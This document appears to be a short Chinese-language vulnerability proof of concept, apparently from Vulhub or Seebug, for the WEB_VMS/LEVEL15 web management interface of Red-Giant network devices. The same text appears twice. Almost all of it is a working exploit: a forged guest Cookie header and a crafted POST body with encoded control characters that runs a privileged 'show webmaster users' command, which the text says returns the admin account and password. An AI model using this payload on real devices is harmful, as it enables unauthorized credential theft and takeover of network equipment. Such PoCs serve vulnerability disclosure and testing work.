VULHUB ™

<p>使用ModifyHeaders修改Cookie头为：</p><pre class="">auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;</pre><p>使用Hackbar发送POST包到：</p><pre class="">http://localhost/WEB_VMS/LEVEL15/</pre><p>内容为：</p><pre class="">command=show%20webmaster%20users%0D%0A&amp;strurl=exec%04&amp;mode=%02PRIV_EXEC&amp;signname=Red-Giant.<span style="font-family: arial, sans-serif; font-size: 16px; line-height: 1.6; background-color: transparent;">&nbsp;</span></pre><p><img alt="DD01098A-E0CE-49EE-B8BC-644CA26EA9F6.png" src="https://images.seebug.org/@/uploads/1434695128838-DD01098A-E0CE-49EE-B8BC-644CA26EA9F6.png" data-image-size="524,111"><br></p><p>得到admin的帐号密码。&nbsp;</p><p><img alt="5FB5B5B1-32E4-485E-9E92-75E54B3DFDC0.png" src="https://images.seebug.org/@/uploads/1434695143339-5FB5B5B1-32E4-485E-9E92-75E54B3DFDC0.png" data-image-size="512,292"><br></p>

<p>使用ModifyHeaders修改Cookie头为：</p><pre class="">auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;</pre><p>使用Hackbar发送POST包到：</p><pre class="">http://localhost/WEB_VMS/LEVEL15/</pre><p>内容为：</p><pre class="">command=show%20webmaster%20users%0D%0A&amp;strurl=exec%04&amp;mode=%02PRIV_EXEC&amp;signname=Red-Giant.<span style="font-family: arial, sans-serif; font-size: 16px; line-height: 1.6; background-color: transparent;">&nbsp;</span></pre><p><img alt="DD01098A-E0CE-49EE-B8BC-644CA26EA9F6.png" src="https://images.seebug.org/@/uploads/1434695128838-DD01098A-E0CE-49EE-B8BC-644CA26EA9F6.png" data-image-size="524,111"><br></p><p>得到admin的帐号密码。&nbsp;</p><p><img alt="5FB5B5B1-32E4-485E-9E92-75E54B3DFDC0.png" src="https://images.seebug.org/@/uploads/1434695143339-5FB5B5B1-32E4-485E-9E92-75E54B3DFDC0.png" data-image-size="512,292"><br></p>